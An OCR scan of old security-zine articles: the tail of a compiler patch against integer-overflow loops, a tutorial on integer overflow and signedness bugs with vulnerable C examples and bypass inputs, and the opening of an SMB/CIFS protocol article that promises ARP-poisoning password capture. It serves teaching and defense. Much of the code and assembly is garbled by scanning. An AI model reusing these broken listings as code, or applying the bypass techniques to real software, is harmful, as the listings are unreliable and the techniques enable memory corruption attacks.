if (nresp != kbdintctxt-—>nreq) 
fatal ("input_userauth_info_response: wrong number of 


replies"); 


if (nresp > 0) { 


xx Vulnerable code ** 
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response = xmalloc(nresp * sizeof (char*)); 
for (i = 0; i < nresp; i++) 
response[i] = packet_get_string(NULL) ; 


} 


<omitted code> 


} 


The above function is translated to the following assembly code if 
compiled with the -fblip protection. (In order to make blip modification 
readable, the code was compiled using -O instead of using -02, which will 
reorder basic blocks) 


.type input_userauth_info_response, @function 
input_userauth_info_response: 


movl -16(%ebp), %eax 
movil $0, 4(%eax) 
call packet_get_int 
movl Seax, Sesi 
movl -20(%ebp), %edx 
cmpl 12 (Sedx), %eax 
je .L111 
movl $.LC15, (%esp) 
call fatal 
Pe eae 
testl Sesi, tesi 
je -L113 
leal O0(,%esi,4), %eax 
movl seax, (%esSp) 
call xmalloc 
movil Seax, —32(Sebp) 
movl SO, %Sebx 
cmpl $0, %esi 
jbe eLI15 
cmpl $268435456, %esi 
jbe -L115 
movl Sesi, (%esp) Blip Check 
call __blip_violation 
ebldSs 
cmpl esi, sebx 
jae -L113 
~L120°: 
movl $0, (%esp) 
call packet_get_string 
movl —32(%ebp), %ecx 
movil Seax, (%ecx, tebx, 4) 
ined. Sebx 
cmpl Sesi, %ebx 
jb -L120 


The blip patch identified the for-loop as a count-loop and injected a 
code to direct the flow to the _blip_violation handler in the case that 
the limit (i.e. nresp) is bigger then the BLIP_MAX. Therefore if nresp 
value will be high enough to trigger an overflow in the call to xmalloc, 
it will also be high enough to get caught by the <blip_check>. 


--[{ 8 - Appendix B - Using blip 


To enable the blip patch one should first add the -fblip flag when 
executing the gcc compiler. 


The blip patch will attempt to emit the <blip_check> whenever it seems 
possible to do so. The patch will silently ignore all loops or calls, 
which cannot be protected. In order to see the ignored loops one can use 
one of the following warning flags, which will also provide a message 


9.txt 


Wed Apr 26 09:43:44 2017 


23 


describing the reason for ignoring the specific loop. 


Warning f 


— blip_for_not_emit - report ignored for 
_not_emit 


b] 


lags: 


- blip_ca 


ip_whil 


reason 


call 
call 
unexpecte 


1_not_emit - report ignored call 


for ignoring a loop will 


loops. 
report ignored while loops. 


Loop variables ar 
for init is not an expression 
to function is made using a pointer to function 
parameters have side effects. 


d results 


less then 4 bytes long 


be one of the following: 


s to loop like function. 


Reusing the expression may cause 


- loop condition is too complex in order to find the loop variables 


- non of loop variables 


is modified 


—- both loop var are modified 
— condition is too complex 


The blip patch is also capabl 
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| [ Basic Integer Overflows ] 


| [ by blexim <blexim@hush.com> ] 


1: Introduction 
1.1 What is an integer? 
1.2 What is an integer overflow? 
1.3 Why can they be dangerous? 


2: Integer overflows 
2.1 Widthness overflows 
2.1.1 Exploiting 
2.2 Arithmetic overflows 
2.2.1 Exploiting 


3: Signedness bugs 
3.1 What do they look like? 
3.1.1 Exploiting 
3.2 Signedness bugs caused by integer overflows 


4: Real world examples 
4.1 Integer overflows 
4.2 Signedness bugs 


--[{ 1.0 Introduction 


In this paper I’m going to describe two classes of programming bugs which 
can sometimes allow a malicious user to modify the execution path of an 
affected process. Both of these classes of bug work by causing variables 
to contain unexpected values, and so are not as "direct" as classes which 
overwrite memory, e.g. buffer overflows or format strings. All the 
xamples given in the paper are in C, so a basic familiarity with C is 
assumed. A knowledge of how integers are stored in memory is also useful, 
but not essential. 


----[ 1.1 What is an integer? 


An integer, in the context of computing, is a variable capable of 
representing a real number with no fractional part. Integers are typically 
the same size as a pointer on the system they are compiled on (i.e. on a 32 
bit system, such as i386, an integer is 32 bits long, on a 64 bit system, 
such as SPARC, an integer is 64 bits long). Some compilers don’t use 
integers and pointers of the same size however, so for the sake of 
simplicity all th xamples refer to a 32 bit system with 32 bit integers, 
longs and pointers. 


Integers, like all variables are just regions of memory. When we talk 
about integers, we usually represent them in decimal, as that is the 
numbering system humans are most used to. Computers, being digital, cannot 
deal with decimal, so internally to the computer integers are stored in 
binary. Binary is another system of representing numbers which uses only 
two numerals, 1 and 0, as opposed to the ten numerals used in decimal. As 
well as binary and decimal, hexadecimal (base sixteen) is often used in 
computing as it is very easy to convert between binary and hexadecimal. 


Since it is often necessary to store negative numbers, there needs to be a 
mechanism to represent negative numbers using only binary. The way this is 
accomplished is by using the most significant bit (MSB) of a variable to 
determine the sign: if the MSB is set to 1, the variable is interpreted as 
negative; if it is set to 0, the variable is positive. This can cause some 
confusion, as will be explained in the section on signedness bugs, because 
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not all variables are signed, meaning they do not all use the MSB to 
determine whether they are positive or negative. These variable are known 
as unsigned and can only be assigned positive values, whereas variables 
which can be either positive or negative are called unsigned. 


----[ 1.2 What is an integer overflow? 


Since an integer is a fixed size (32 bits for the purposes of this paper), 
there is a fixed maximum value it can store. When an attempt is made to 
store a value greater than this maximum value it is known as an integer 
overflow. The ISO C99 standard says that an integer overflow causes 
"undefined behaviour", meaning that compilers conforming to the standard 
may do anything they like from completely ignoring the overflow to aborting 
the program. Most compilers seem to ignore the overflow, resulting in an 
unexpected or erroneous result being stored. 


----[ 1.3 Why can they be dangerous? 


Integer overflows cannot be detected after they have happened, so there is 
not way for an application to tell if a result it has calculated previously 
is in fact correct. This can get dangerous if the calculation has to do 
with the size of a buffer or how far into an array to index. Of course 
most integer overflows are not exploitable because memory is not being 
directly overwritten, but sometimes they can lead to other classes of bugs, 
frequently buffer overflows. As well as this, integer overflows can be 
difficult to spot, so even well audited code can spring surprises. 


--[ 2.0 Integer overflows 


So what happens when an integer overflow does happen? ISO C99 has this to 
say: 


"A computation involving unsigned operands can never overflow, 
because a result that cannot be represented by the resulting unsigned 
integer type is reduced modulo the number that is one greater than 
the largest value that can be represented by the resulting type." 


NB: modulo arithmetic involves dividing two numbers and taking the 
remainder, 
e.g. 

10 modulo 5 = 0 

11 modulo 5 = 1 
so reducing a large value modulo (MAXINT + 1) can be seen as discarding the 
portion of the value which cannot fit into an integer and keeping the rest. 
In C, the modulo operator is a % sign. 
</NB> 


This is a bit wordy, so maybe an example will better demonstrate the 
typical "undefined behaviour": 


We have two unsigned integers, a and b, both of which are 32 bits long. We 
assign to a the maximum value a 32 bit integer can hold, and to b we assign 
1. We add a and b together and store the result in a third unsigned 32 bit 
integer called r: 


a = Oxffffffftf 
b = Oxl 
r=at+tb 


Now, Since the result of the addition cannot be represented using 32 bits, 
the result, in accordance with the ISO standard, is reduced modulo 
0x100000000. 


vr = (Oxffffffff + Ox1) % 0x100000000 
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x = (0x100000000) % 0x100000000 = 0 


Reducing the result using modulo arithmetic basically ensures that only the 
lowest 32 bits of the result are used, so integer overflows cause the 
result to be truncated to a size that can be represented by the variable. 
This is often called a "wrap around", as the result appears to wrap around 
to 0. 


----[ 2.1 Widthness overflows 


So an integer overflow is the result of attempting to store a value ina 
variable which is too small to hold it. The simplest example of this can 
be demonstrated by simply assigning the contents of large variable to a 
smaller one: 


/* exl.c - loss of precision */ 
include <stdio.h> 


int main(void) { 


GHA «Le 

short s; 

char c; 

as Oxdeadbeef; 

s=1l; 

c= 1; 

printf("1 = Ox%x (%d bits)\n", 1, sizeof(1) * 8); 
printf("s = O0x%x (%d bits)\n", s, sizeof(s) * 8); 
printf("c = Ox%x (%d bits)\n", c, sizeof(c) * 8); 


return 0; 


} 
/* EOF */ 


The output of which looks like this: 


nova:signed {48} ./exl 

1 = Oxdeadbeef (32 bits) 
s = Oxffffbeef (16 bits) 
ie! Oxffffffef (8 bits) 


Since each assignment causes the bounds of the values that can be stored in 
each type to b xceeded, the value is truncated so that it can fit in the 
variable it is assigned to. 


It is worth mentioning integer promotion here. When a calculation 
involving operands of different sizes is performed, the smaller operand is 
"promoted" to the size of the larger one. The calculation is then 
performed with these promoted sizes and, if the result is to be stored in 
the smaller variable, the result is truncated to the smaller size again. 
For example: 


int i; 
short s; 


SS A 


A calculation is being performed with different sized operands here. What 
happens is that the variable s is promoted to an int (32 bits long), then 
the contents of i is copied into the new promoted s. After this, the 
contents of the promoted variable are "demoted" back to 16 bits in order to 
be saved ins. This demotion can cause the result to be truncated if it is 
greater than the maximum value s can hold. 


------ [ 2.1.1 Exploiting 
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Integer overflows are not like most common bug classes. They do not allow 
direct overwriting of memory or direct execution flow control, but are much 
more subtle. The root of the problem lies in the fact that there is no way 
for a process to check the result of a computation after it has happened, 
so there may be a discrepancy between the stored result and the correct 
result. Because of this, most integer overflows are not actually 
exploitable. Even so, in certain cases it is possible to force a crucial 
variable to contain an erroneous value, and this can lead to problems later 
in the code. 


Because of the subtlety of these bugs, there is a huge number of situations 
in which they can be exploited, so I will not attempt to cover all 
exploitable conditions. Instead, I will provide examples of some 
Situations which are exploitable, in the hope of inspiring the reader in 
their own research :) 


Example 


/* widthl.c - exploiting a trivial widthness bug */ 
include <stdio.h> 
include <string.h> 


int main(int argc, char *argv[]) { 
unsigned short s; 
int 1; 


char buf[80]; 


if(arge < 3){ 
return -1; 


} 


= atoi(argv[1]); 
s =i; 


if(s >= 80){ /* [wl] */ 
printf("Oh no you don’t!\n"); 
return -1; 

printf("s = d\n", s); 

memcpy (buf, argv[2], i); 

but br] =<7\0"s 


printf("Ss\n", buf); 


return 0; 


While a construct like this would probably never show up in real life code, 
it serves well as an example. Take a look at the following inputs: 


nova:signed {100} ./widthl 5 hello 
Sust5 
hello 
nova:signed {101} ./width1l 80 hello 

Oh no you don’t! 

nova:signed {102} ./widthl 65536 hello 
s = 0 
Segmentation fault (core dumped) 


The length argument is taken from the command line and held in the integer 
i. When this value is transferred into the short integer s, it is 
truncated if the value is too great to fit into s (i.e. if the value is 
greater than 65535). Because of this, it is possible to bypass the bounds 
check at [wl] and overflow the buffer. After this, standard stack smashing 
techniques can be used to exploit the process. 
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----[ 2.2 Arithmetic overflows 


As shown in section 2.0, if an attempt is made to store a value in an 
integer which is greater than the maximum value the integer can hold, the 
value will be truncated. If the stored value is the result of an 
arithmetic operation, any part of the program which later uses the result 
will run incorrectly as the result of the arithmetic being incorrect. 
Consider this example demonstrating the wrap around shown earlier: 


/* ex2.c - an integer overflow */ 
#include <stdio.h> 


int main(void) { 
unsigned int num = Oxffffffff; 


printf("num is %d bits long\n", sizeof(num) * 8); 
printf ("num = 0x%x\n", num); 
printf ("num + 1 = Ox%x\n", num + 1); 


return 0; 


} 
/* EOF */ 


The output of this program looks like this: 


nova:signed {4} ./ex2 
num is 32 bits long 
num = Oxffffffft 

num + 1 = 0x0 


Note: 

The astute reader will have noticed that Oxffffffff is decimal -1, so it 
appears that we’re just doing 

1 + (-1) = 0 

Whilst this is one way at looking at what’s going on, it may cause some 
confusion since the variable num is unsigned and therefore all arithmetic 
done on it will be unsigned. As it happens, a lot of signed arithmetic 
depends on integer overflows, as the following demonstrates (assume both 
operands are 32 bit variables): 


-700 + 800 = 100 
Oxfffffd44 + 0x320 = 0x100000064 


Since the result of the addition exceeds the range of the variable, the 


lowest 32 bits are used as the result. These low 32 bits are 0x64, which 
is equal to decimal 100. 
</note> 


Since an integer is signed by default, an integer overflow can cause a 


change in signedness which can often have interesting effects on subsequent 


code. Consider the following example: 


/* ex3.c - change of signedness */ 
#include <stdio.h> 


int main(void) { 
iat “Ll; 


1 = Ox7f£ffffff; 


printf£("1 = $d (Ox%x)\n", 1, 1); 
printf("1 + 1 = $d (Ox%x)\n", 1 +1, 141); 


return 0; 


/* EOF */ 
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The output of which is: 
nova:signed {38} ./ex3 


L = 2147483647 (Ox7fffffFF) 
1 + 1 = -2147483648 (0x80000000) 


Here the integer is initialised with the highest positive value a signed 
long integer can hold. When it is incremented, the most significant bit 
(indicating signedness) is set and the integer is interpreted as being 
negative. 


Addition is not the only arithmetic operation which can cause an integer to 
overflow. Almost any operation which changes the value of a variable can 
cause an overflow, as demonstrated in the following example: 


/* ex4.c - various arithmetic overflows */ 
#include <stdio.h> 


int main(void) { 
DNC. AL. Ke 


1 = 0x40000000; 


printf("1 = $d (Ox%x)\n", 1, 1); 

x = 1 + Oxc0000000; 

printf("1 + Oxc0000000 = %d (Ox%x)\n", x, xX); 
x = 1 * 0x4; 

printf("1 * 0x4 = $d (Ox%x)\n", x, x); 

x = 1 - Oxffffffff; 

printf("1 - Oxffffffff = td (Ox%x)\n", x, x); 


return 0; 
} 
/* EOF */ 


Output: 


nova:signed {55} ./ex4 

1 = 1073741824 (0x40000000) 

0xc0000000 = 0 (0x0) 

1 0x4 = 0 (0x0) 

1 Oxffffffff = 1073741825 (0x40000001) 


+ + 


The addition is causing an overflow in exactly the same way as the first 


example, and so is the multiplication, although it may seem different. In 
both cases the result of the arithmetic is too great to fit in an integer, 
so it is reduced as described above. The subtraction is slightly 


different, as it is causing an underflow rather than an overflow: an 
attempt is made to store a value lower than the minimum value the integer 
can hold, causing a wrap around. In this way we are able to force an 
addition to subtract, a multiplication to divide or a subtraction to add. 


—----- [ 2.2.1 Exploiting 


One of the most common ways arithmetic overflows can be exploited is when a 
calculation is made about how large a buffer must be allocated. Often a 
program must allocate space for an array of objects, so it uses the 
malloc(3) or calloc(3) routines to reserve the space and calculates how 
much space is needed by multiplying the number of elements by the size of 
an object. As has been previously shown, if we are able to control either 
of these operands (number of elements or object size) we may be able to 
mis-size the buffer, as the following code fragment shows: 


int myfunction(int *array, int len) { 
int *myarray, i; 
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myarray = malloc(len * sizeof(int)); J TL AL 
if (myarray == NULL) { 
return -1; 


} 
for(i = O; i < len; i++) /*® [2] */ 
myarray[i] = array[il]; 


} 


return myarray; 


} 


This seemingly innocent function could bring about the downfall of a system 


due to its lack of checking of the len parameter. The multiplication at 
[1] can be made to overflow by supplying a high enough value for len, so we 
can force the buffer to be any length we choose. By choosing a suitable 


value for len, we can cause the loop at [2] to write past the end of the 
myarray buffer, resulting in a heap overflow. This could be leveraged into 
executing arbitrary code on certain implementations by overwriting malloc 
control structures, but that is beyond the scope of this article. 


Another example: 


int catvars(char *bufl, char *buf2, unsigned int lenl, 
unsigned int len2) { 
char mybuf [256]; 


if((lenl + len2) > 256) { /* [3] ¥*/ 
return —-1; 


} 


memcpy (mybuf, bufl, lenl); /* [4] */ 
memcpy (mybuf + lenl, buf2, len2); 


do_some_stuff (mybuf) ; 


return 0; 


} 


In this example, the check at [3] can be bypassed by using suitable values 
for lenl and len2 that will cause the addition to overflow and wrap around 
to a low number. For example, the following values: 


lenl = 0x104 
len2 = Oxfffffffc 


when added together would result in a wrap around with a result of 0x100 
(decimal 256). This would pass the check at [3], then the memcpy(3)’s at 
[4] would copy data well past the end of the buffer. 


--[{ 3 Signedness Bugs 


Signedness bugs occur when an unsigned variable is interpreted as signed, 
or when a signed variable is interpreted as unsigned. This type of 
behaviour can happen because internally to the computer, there is no 
distinction between the way signed and unsigned variables are stored. 
Recently, several signedness bugs showed up in the FreeBSD and OpenBSD 
kernels, so there are many examples readily available. 


----[ 3.1 What do they look like? 


Signedness bugs can take a variety of forms, but some of the things to look 
out for are: 
* signed integers being used in comparisons 
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* signed integers being used in arithmetic 
* unsigned integers being compared to signed integers 


Here is classic example of a signedness bug: 


int copy_something(char *buf, int len) { 
char kbuf[800]; 
if(len > sizeof (kbuf) ) { fe [OD] PZ, 
return -1; 
} 
return memcpy (kbuf, buf, len); /* [2] */ 


} 


The problem here is that memcpy takes an unsigned int as the len parameter, 
but the bounds check performed before the memcpy is done using signed 
integers. By passing a negative value for len, it is possible to pass the 
c 

a 

e 


heck at [1], but then in the call to memcpy at [2], len will be interpeted 
s a huge unsigned value, causing memory to be overwritten well past the 
nd of the buffer kbuf. 


Another problem that can stem from signed/unsigned confusion occurs when 
arithmetic is performed. Consider the following example: 


int table[800]; 
int insert_in_table(int val, int pos) { 


if(pos > sizeof(table) / sizeof (int)) { 
return -1; 


} 
table[pos] = val; 


return 0; 


} 


Since the line 


table[pos] = val; 
is equivalent to 
*(table + (pos * sizeof(int))) = val; 


we can see that the problem here is that the code does not expect a 
negative operand for the addition: it expects (table + pos) to be greater 
than table, so providing a negative value for pos causes a situation which 
the program does not expect and can therefore not deal with. 


Exploiting 


This class of bug can be problematic to exploit, due to the fact that 
signed integers, when interpreted as unsigned, tend to be huge. For 
xample, -1 when represented in hexadecimal is Oxffffffff. When 
interpreted as unsiged, this becomes the greatest value it is possible to 


represent in an integer 


(4,294,967,295), so 


mempcpy as the len parameter 


(for example), 


if this value is passed to 
memcpy will attempt to copy 4GB 


of data to the destination buffer. 


Obviously this is likely to cause a 


segfault or, if not, to trash a large amount of the stack or heap. 
Sometimes it is possible to get around this problem by passing a very low 
value for the source address and hope, but this is not always possible. 


----[ 3.2 Signedness bugs caused by integer overflows 
Sometimes, it is possible 
a negative number. Since 


value, it may be possible 


to overflow an integer so that it wraps around to 
the application is unlikely to expect such a 
to trigger a signedness bug as described above. 


An example of this type of bug could look like this: 
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int get_two_vars(int sock, char *out, int len) { 
char buf1[512], buf2[512]; 
unsigned int sizel, size2; 
int size; 


if (recv(sock, bufl, sizeof(bufl), 0) < 0){ 
return -1; 

} 

if (recv(sock, buf2, sizeof(buf2), 0) < 0O){ 
return -1; 


} 
/* packet begins with length information */ 
memcpy (&sizel, bufl, sizeof (int)); 


memcpy (&size2, buf2, sizeof (int)); 


size = sizel + size2; /* [1] */ 


if(size > len) { ime yd and 
return -1; 


} 


memcpy (out, bufl, sizel); 
memcpy (out + sizel, buf2, size2); 


return size; 


} 


This example shows what can sometimes happen in network daemons, especially 
when length information is passed as part of the packet (in other words, it 
is supplied by an untrusted user). The addition at [1], used to check that 
the data does not exceed the bounds of the output buffer, can be abused by 
setting sizel and size2 to values that will cause the size variable to wrap 
around to a negative value. Example values could be: 

sizel = Ox7fffffff 

size2 = Ox7ffffffFf 

(Ox7fffFffff + Ox7fffffff = Oxfffffffe (-2)). 
When this happens, the bounds check at [2] passes, and a lot more of the 
out buffer can be written to than was intended (in fact, arbitrary memory 
can be written to, as the (out + sizel) dest parameter in the second memcpy 
call allows us to get to any location in memory). 


These bugs can be exploited in exactly the same way as regular signedness 
bugs and have the same problems associated with them i.e. negative values 
translate to huge positive values, which can easily cause segfaults. 


-—-[ 4 Real world examples 


There are many real world applications containing integer overflows and 
Signedness bugs, particularly network daemons and, frequently, in operating 
system kernels. 


-—---[ 4.1 Integer overflows 
This (non-exploitable) example was taken from a security module for linux. 
This code runs in the kernel context: 


int rsbac_acl_sys_group(enum rsbac_acl_group_syscall_type_t call, 
union rsbac_acl_group_syscall_arg_t arg) 


{ 


switch (call) 
{ 
case ACLGS_get_group_members: 
if ( (arg.get_group_members.maxnum <= 0) /* [A] */ 
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|| targ.get_group_members.group 
) 
{ 


rsbac_uid_t * user_array; 
rsbac_time_t * ttl_array; 


user_array = vmalloc(sizeof(*user_array) * 
arg.get_group_members.maxnum) ; cf TBY Re 
if (!'user_array) 

return -RSBAC_ENOMEM; 
ttl_array = vmalloc(sizeof(*ttl_array) * 
arg.get_group_members.maxnum); /* [C] */ 
if (!ttl_array) 

{ 


vfree (user_array) ; 
return -RSBAC_ENOMEM; 


err = 
rsbac_acl_get_group_members (arg.get_group_members.group, 
user_array, 
ttl_array, 


arg.get_group_members.max 
num) ; 


} 


In this example, the bounds checking at [A] is not sufficient to prevent 
the integer overflows at [B] and [C]. By passing a high enough (i.e. 
greater than Oxffffffff / 4) value for arg.get_group_members.maxnum, we 
can cause the multiplications at [B] and [C] to overflow and force the 
buffers ttl_array and user_array to be smaller than the application 
expects. Since rsbac_acl_get_group_members copies user controlled data 
to these buffers, it is possible to write past the end of the user_array 
and ttl_array buffers. In this case, the application used vmalloc() to 
allocate the buffers, so an attempt to write past the end of the buffers 
will simply raise an error, so it cannot be exploited. Even so, it 
provides an example of what these bugs can look like in real code. 


Another example of a recent real world integer overflow vulnerability 

was the problem in the XDR RPC library (discovered by ISS X-Force). In this 
case, user supplied data was used in the calculation of the size of a 
dynamically allocated buffer which was filled with user supplied data. The 
vulnerable code was this: 


bool_t 
xdr_array (xdrs, addrp, sizep, maxsize, elsize, elproc) 
XDR *xdrs; 
caddr_t *addrp; /* array pointer */ 
u_int *sizep; /* number of elements */ 
u_int maxsize; /* max numberof elements */ 
u_int elsize; /* size in bytes of each element */ 
xdrproc_t elproc; /* xdr routine to handle each element */ 


WP Nt. ay 

caddr_t target = *addrp; 

Want. :e; /* the actual element count */ 
bool_t stat = TRUE; 

u_int nodesize; 


c = *sizep; 
if ((c > maxsize) && (xdrs->x_op != XDR_FREE 


=] 
— 
~~ 


return FALSE; 
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nodesize = c * elsize; /* [1] */ 


xaddrp = target = mem_alloc (nodesize); PR IPQ AF 


for (i = 0; (i < c) && stat; itt) 


stat = (*elproc) (xdrs, target, LASTUNSIGNED) ; /* [3] */ 
target += elsize; 


} 


As you can see, by supplying large values for elsize and c (sizep), it 

was possible to cause the multiplication at [1] to overflow and cause 
nodesize to be much smaller than the application expected. Since 

nodesize was then used to allocate a buffer at [2], the buffer could be 
mis-sized leading to a heap overflow at [3]. For more information on this 
hole, see the CERT advisory listed in the appendix. 


----[ 4.2 Signedness bugs 


Recently, several signedness bugs were brought to light in the freebsd 


kernel. These allowed large portions of kernel memory to be read by 
passing 

negative length paramters to various syscalls. The getpeername(2) function 
had such a problem and looked like this: 


static int 
getpeernamel(p, uap, compat) 
struct proc. *p; 
register struct getpeername_args /* { 
int fdes; 
caddr_t asa; 
int *alen; 
} */ *uap; 
int compat; 
{ 
struct file *fp; 
register struct socket *so; 
struct sockaddr *sa; 
int len, error; 


error = copyin((caddr_t)uap->alen, (caddr_t)&len, sizeof (len)); 
if (error) { 

fdrop(fp, p); 

return (error); 


len = MIN(len, sa->sa_len); /* [1] */ 

error = copyout(sa, (caddr_t)uap->asa, (u_int)len); 

if (error) 

goto bad; 

gotnothing: 

error = copyout ((caddr_t)élen, (caddr_t)uap->alen, sizeof (len)); 
bad: 

if (sa) 


x 


FREE (sa, M_SONAME) ; 
fdrop(fp, p); 
return (error); 
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This is a classic example of a signedness bug - the check at [1] did not 
take into account the fact that len could be negative, in which case the 
MIN macro would always return len. When this negative len parameter was 
passed to copyout, it was interpretted as a huge positive integer which 
caused copyout to copy up to 4GB of kernel memory to user space. 


-—-[ Conclusion 


Integer overflows can be extremely dangerous, partly because it is 
impossible to detect them after they have happened. If an integer overflow 
takes place, the application cannot know that the calculation it has 
performed is incorrect, and it will continue under the assumption that it 
is. Even though they can be difficult to exploit, and frequently cannot be 
exploited at all, they can cause unepected behaviour, which is never a good 
thing in a secure system. 


—-[ Appendix 


CERT advisory on the XDR bug: 
http://www.cert.org/advisories/CA-2002-25.html 
FreeBSD advisory: http://online.securityfocus.com/advisories/4407 
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Appendix B 


--[{ 1 - Introduction 


In this article, I will try to explain what CIFS and SMB are , how 
it works and some common insecurities present on these protocols. 
This article constitue a useful source of knowledge about Microsoft 
networking. The SMB protocol is one of the most used protocols on LAN. 
I have also included source code in the aim of giving a good expamle 
of SMB operating. 


You will learn how to use ARP poisoning to have password in clear 
from the network when all SMB passwords are encrypted (without brute 
forcing). You will be able to understand the link between SMB and 
NETBIOS. You will also learn what is and how works the Microsoft 
Remote Administration Protocol (RAP) for scanning remote shares on a 
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SMB server. 


Programs and information are given for educational purpose only. 
I could be not responsable of what you will make with. 


--[ 2 - What is SMB/CIFS ? 


According to Microsoft CIFS is intended to provide an open cross- 
platform mechanism for client systems to request file and print 
services from server systems over a network. It is based on the 
standard Server Message Block (SMB) protocol widely in use by 
personal computers and workstations running a wide variety of 
operating systems. 


In fact, SMB (for Server Message Block) is a protocol which operates 
the data transfert between sharing files, devices, named pipes 
or mail slot across a network. CIFS is a public version of SMB. 


SMB clients available 


from Microsoft : Windows 95, Windows for workgroups 3.x, 
Windows NT,2000 and XP 


for Linux 
Smblient from Samba 
Smbfs for Linux 


SMB servers 

Samba 

Microsoft Windows for Workgroups 3.x 
Microsoft Windows 95 

Microsoft Windows NT 
The PATHWORKS family of servers from Digital 
LAN Manager for OS/2,SCO,etc 
VisionFS from SCO 
TotalNET Advanced Server from Syntax 
Advanced Serverfor UNIX from AT&T (NCR?) 
LAN Server for OS/2 from IBM. 


--[ 3 - Session establishment 


Note : SMB protocol was developed to run on DOS ( powered by an 
Intel chip) so byte ordering is little-endian the opposite of network 
ordering. 


SMB can run over TCP/IP, NetBEUI, DECnet Protocol and IPX/SPX. 
With a SMB implementation over TCP/IP, DECnet or NETBEUI, the 
NETBIOS names must be use. 


I will explain in the sixth chapter what NETBIOS is. But for the 
moment, you just have to know that a NETBIOS name identifies one computer 
on a Microsoft network. 


The development of SMB has begun in the eighties, so there is a lot 
of versions of the SMB protocol. But the most used (on Windows 95, 
98, Windows NT, Windows 2000 and XP) is the NT LM 0.12 
version. This article is based on the NT LM 0.12 version. 


You have to know that a SMB Domain name identifies a group of 
ressource (users, printers, files ..) on a SMB server. 


How does a client establish a SMB session with a server ? 


Let’s take this situation : a client wants to access to a specific 
ressource on a server. 
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-— To begin the client requests the server for a NETBIOS session. 
The client sends his encoded NETBIOS name to the SMB server 
(which listening connection requests on port 139). 
The server receives the NETBIOS name and replies with a NETBIOS 
session packet to valid the session. The client enters after ina 
SMB session establishment i.e the identification of the client 
to the SMB server. 


2 The client sends a SMB negprot request packet (negprot for 
"negotiate protocol"). The client gives a list of SMB protocol 
versions supported. 

Then the server sends a SMB negprot reply packet (with informations 
like SMB domain name, maximun connections accepted, 

SMB protocol versions supported ...) 


3 After the negotiation of protocols, the client processes to a user 
or share identification on the server.(s the next chapter to know 
what is the difference between a share and a user identification) 


This process is operated by the SesssetupX request packet (SesssetupX 
for Session Setup and X). 

The client sends a couple login/password or a simple password to the 
server that refuses or allows the conection with a SessetupX reply 
packet. 


4 - Ok, when the client has finished with negotiation and identification 
it sends a tconX packet for specifying the network name of the ressource 
that it wants to access, and the server sends a Tconx reply indicating 
if the connection is accepted or not. 


netbios session request 
(netbios name) 


[client] > [server] 
1) 
netbios session granted 
[client] < [server] 
SMB negprot request 
[client] > [server] 
2) 
SMB negprot reply 
[client] < [server] 
SMB sesssetupxX request 
[client] > [server] 
3) 
SMB sesssetupX reply 
[client] < [server] 
SMB TconX request 
[client] > [server] 
4) 
SMB TconxX reply 


[client] < [server] 


A complete description of each packets is given in the chapter six. 
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--[ 4 - Security level of SMB 


There is two types of security models on SMB 


The first is the "Share level" security model. This security model 
associates a password to a shared ressource on the network. The user 
logs to this ressource (IPC, Disk, Printers) with the correct password. 


The user is anyone on the network who knows the name of the server wher 
the ressource is. 

The second is the "User Level". This security model is an enhanced 
implementation of the first. It consists to associate a couple of 
login/password to a shared ressource. So if a person wants to 
connect to this shared ressource, he has to know the login/password 
couple. This security level is useful to know who makes what. 


--[ 5 - Passwords 


With SMB, when you have to make an identification on a server, your 
password could be sent in clear or encrypted. If the server supports 
encryption, the client will have to answer a challenge. The server 
knows the password, so in the negprot reply packet, an encryption key 
will be send to the client. The client encrypts the password, 
and sends it in the SesssetupX request packet, the server verifies th 
validity of the password and allows the session or not. 


You have to know that a SMB password (not encrypted) is 14 bytes 

long maximum. The size of the encryption key is usually 8 bytes long. 
The size of the encrypted password is 24 bytes. With ANSI password, the 
characters of the password are converted in upper case for the 
encryption. 


The password is encrypted with a DES encryption in block mode. 


--[6 - Description of several SMB packets 


In this part I will give the description of the most important 
packets types involved in SMB protocol. I know it’s a bit boring 
but this is the base to understand how works SMB and the attacks. 
I will explain what is very important in each type of packet. 
For each type of command correspond two types of packets. The request 
packet and the reply packet. 


----[ 6.1 - The general aspect of a SMB packet. 


In the majority of case SMB runs over TCP/IP protocol suite. 
So let’s consider that SMB runs over TCP layer for us. Over the TCP 
layer, you will always find the NETBIOS (NBT) header. Over NBT you 
have the SMB base header. Over the SMB base header, you have an 
another type of header, which depends of the specific command you 
request. 


TCP header 


NETBIOS header 


SMB base header 


SMB Command header 


DATA 
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The "SMB Base header" contains several informations, like the size of 
reception buffers, maximum connexions allowed... It also contains a 
number that identifies the command requested. 


"SMB command header" is a header with all the parameters for the 
requested command (a command like negotiate protocol versions ... ) 


"DATA" is the data for the requested command. 


I call "SMB packet", the NETBIOS Header + the SMB base header + 
the SMB Command header + DATA. 


NOTE : I will use this definitions 

typedef unsigned char UCHAR; // 8 unsigned bits 
typedef unsigned short USHORT; // 16 unsigned bits 
typedef unsigned long ULONG; // 32 unsigned bits 


and STRING defined a null terminated ASCII string. 


—---[ 6.2 - NETBIOS and SMB 


n Microsoft networks. It is a sofware interface and a naming system. 
Each computer has a NETBIOS name, which is 15 characters long, and a 
sixteenth character is used to identify the type of computer 

( Domain Name server, workstation...). 


NETBIOS (for NETwork Basic Input and Outpout System) is widely use 
fe) 


Value for the sixteenth character 


0x00 base computer, workstation. 
0x20 resource sharing server. 


There are other values but these are the most interessant for us. The 
first (0x00) identify a workstation and the second (0x20) the server. 


On a SMB packet, the NETBIOS header corresponds to the NETBIOS 
Session header, defined like this 


UCHAR Type; // Type of the packet 

UCHAR Flags; // Flags 

USHORT Length; // Count of data bytes (netbios header 
not included) 


For the "Flags" field, the value is always 0. (with SMB, not in general !) 


For the "Type" field, several values are possible 


0x81 corresponds to a NETBIOS session request. This code 
is used when the client sends its NETBIOS name to the server. 


0x82 is a positive response to a NETBIOS session request. 
This code is used by the server to authorize a NETBIOS session. 


0x00 correspond to a session message. This code is always 
used in a SMB session i.e when the client has sent his NETBIOS name to 
the server and has received a positive reply. 


The "Length" field contains a count of data bytes (The netbios header 
is not included), "data" means what is above the NETBIOS header (it 
could be the SMB Base header + SMB Command header + DATA or NETBIOS 
names). 


NETBIOS names and encoding 


11.txt 


> 
4 
fe 


A NETBIOS name is 


Wed Apr 26 09:43:44 2017 


It’s very easy to encode a N 
of my computer is "BILL" and it’s a workstation so there is a "0x00" 
for the sixteenth character. 


Firstly, when 


"BILL 


In hexadecimal 


BIOS encoded name is 32 bytes long. 


ETBIOS name. 


always given in upper case characters. 


For example the NETBIOS name 


a NETBIOS name is shorter than 15 bytes, it may be padded 
on the right with spaces. 


